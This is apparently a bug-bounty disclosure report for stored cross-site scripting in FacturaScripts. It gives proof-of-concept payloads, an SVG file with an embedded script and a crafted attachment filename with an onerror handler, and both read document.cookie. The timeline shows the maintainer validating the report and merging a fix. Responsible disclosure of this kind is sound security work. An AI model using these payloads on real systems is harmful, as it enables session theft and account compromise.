Multiple Store XSS via upload svg file and the file name of attachment in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

Hi There, facturascripts is vulnerable to store XSS by upload svg file, and the filename

Step to produce with svg file

Login as admin or any account has role Admin->Library, access Admin -> library -> New and upload file svg with content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

save this. XSS will be trigger when you download it.

xss4.png

Step to produce with file name payload:

just upload file with the file name: %22><img src=x onerror=alert(document.cookie).xlsx -> xss will be trigger

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
minhnb modified the report
a month ago
minhnb modified the report
a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
minhnb has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 1d1edb a month ago
The fix bounty has been dropped
minhnb
a month ago

Researcher


Carlos Garcia
a month ago

Maintainer


You're right. I have corrected it in this commit https://github.com/NeoRazorX/facturascripts/commit/a5e64bb5f29367e072dfc984e775731c6b3dd8f4

Thank you so much for everything

to join this conversation